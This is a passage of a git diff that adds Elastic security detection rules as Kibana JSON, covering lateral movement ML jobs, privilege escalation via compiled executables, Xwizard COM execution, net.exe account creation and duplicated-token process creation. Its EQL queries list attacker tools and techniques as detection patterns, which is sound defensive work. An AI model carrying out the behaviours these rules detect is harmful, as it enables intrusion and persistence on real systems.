file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4.json new file mode 100644 index 00000000000..a6ae1b33de3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Recently Compiled Executable", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"gcc\", \"g++\", \"cc\") and user.id != \"0\"] by process.args\n [file where host.os.type == \"linux\" and event.action == \"creation\" and event.type == \"creation\" and \n process.name == \"ld\" and user.id != \"0\"] by file.name\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n user.id != \"0\"] by process.name\n [process where host.os.type == \"linux\" and event.action in (\"uid_change\", \"guid_change\") and event.type == \"change\" and \n user.id == \"0\"] by process.name\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "193549e8-bb9e-466a-a7f9-7e783f5cb5a6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3.json b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3.json new file mode 100644 index 00000000000..4976f8df6bb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high number of processes started in a single RDP session. Executing a large number of processes remotely on other machines can be an indicator of lateral movement activity.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_sum_rdp_number_of_processes", + "name": "Spike in Number of Processes in an RDP Session", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "19e9daf3-f5c5-4bc2-a9af-6b1e97098f03", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_108.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_108.json new file mode 100644 index 00000000000..5462cf91159 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_108.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Component Object Model (COM) is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects or executable code. Xwizard can be used to run a COM object created in registry to evade defensive counter measures.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of COM object via Xwizard", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"xwizard.exe\" or ?process.pe.original_file_name : \"xwizard.exe\") and\n (\n (process.args : \"RunWizard\" and process.args : \"{*}\") or\n (process.executable != null and\n not process.executable : (\"C:\\\\Windows\\\\SysWOW64\\\\xwizard.exe\", \"C:\\\\Windows\\\\System32\\\\xwizard.exe\")\n )\n )\n", + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1a6075b0-7479-450e-8fe7-b8b8438ac570_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_109.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_109.json new file mode 100644 index 00000000000..62e1c0d3249 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_109.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Component Object Model (COM) is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects or executable code. Xwizard can be used to run a COM object created in registry to evade defensive counter measures.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of COM object via Xwizard", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"xwizard.exe\" or ?process.pe.original_file_name : \"xwizard.exe\") and\n (\n (process.args : \"RunWizard\" and process.args : \"{*}\") or\n (process.executable != null and\n not process.executable : (\"C:\\\\Windows\\\\SysWOW64\\\\xwizard.exe\", \"C:\\\\Windows\\\\System32\\\\xwizard.exe\")\n )\n )\n", + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1a6075b0-7479-450e-8fe7-b8b8438ac570_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_108.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_108.json new file mode 100644 index 00000000000..21f60572bda --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_108.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create new users. This is sometimes done by attackers to increase access or establish persistence on a system or domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "User Account Creation", + "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n- Windows User Account Creation - 38e17753-f581-4644-84da-0d60a8318694\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"net.exe\", \"net1.exe\") and\n not process.parent.name : \"net.exe\" and\n (process.args : \"user\" and process.args : (\"/ad\", \"/add\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1aa9181a-492b-4c01-8b16-fa0735786b2b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_109.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_109.json new file mode 100644 index 00000000000..38327b7ce79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_109.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create new users. This is sometimes done by attackers to increase access or establish persistence on a system or domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "User Account Creation", + "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n- Windows User Account Creation - 38e17753-f581-4644-84da-0d60a8318694\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"net.exe\", \"net1.exe\") and\n not process.parent.name : \"net.exe\" and\n (process.args : \"user\" and process.args : (\"/ad\", \"/add\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1aa9181a-492b-4c01-8b16-fa0735786b2b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_2.json b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_2.json new file mode 100644 index 00000000000..8996d994782 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_2.json @@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process impersonating the token of another user logon session. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Created with a Duplicated Token", + "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n (process.Ext.effective_parent.executable regex~ \"\"\"[C-Z]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9\\-\\_\\.]+\\.exe\"\"\" or\n process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\") and\n\n (\n process.name : (\"powershell.exe\", \"cmd.exe\", \"rundll32.exe\", \"notepad.exe\", \"net.exe\", \"ntdsutil.exe\",\n \"tasklist.exe\", \"reg.exe\", \"certutil.exe\", \"bitsadmin.exe\", \"msbuild.exe\", \"esentutl.exe\") or\n\n ((process.Ext.relative_file_creation_time <= 900 or process.Ext.relative_file_name_modify_time <= 900) and\n not process.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n not process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ) and\n not (process.name : \"rundll32.exe\" and\n process.command_line : (\"*davclnt.dll,DavSetCookie*\", \"*?:\\\\Program Files*\",\n \"*\\\\Windows\\\\System32\\\\winethc.dll*\", \"*\\\\Windows\\\\SYSTEM32\\\\EDGEHTML.dll*\",\n \"*shell32.dll,SHCreateLocalServerRunDll*\")) and\n not startswith~(process.Ext.effective_parent.name, process.parent.name) and \n not (process.name : \"powershell.exe\" and process.parent.name : \"wmiprvse.exe\" and process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\sihost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\sethc.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\" and \n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\twain_32\\\\*.exe\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1b0b4818-5655-409b-9c73-341cac4bb73f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + }, + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "1b0b4818-5655-409b-9c73-341cac4bb73f_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_3.json b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_3.json new file mode 100644 index 00000000000..cf27bd6ba22 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_3.json @@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process impersonating the token of another user logon session. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Created with a Duplicated Token", + "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n (process.Ext.effective_parent.executable regex~ \"\"\"[C-Z]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9\\-\\_\\.]+\\.exe\"\"\" or\n process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\") and\n\n (\n process.name : (\"powershell.exe\", \"cmd.exe\", \"rundll32.exe\", \"notepad.exe\", \"net.exe\", \"ntdsutil.exe\",\n \"tasklist.exe\", \"reg.exe\", \"certutil.exe\", \"bitsadmin.exe\", 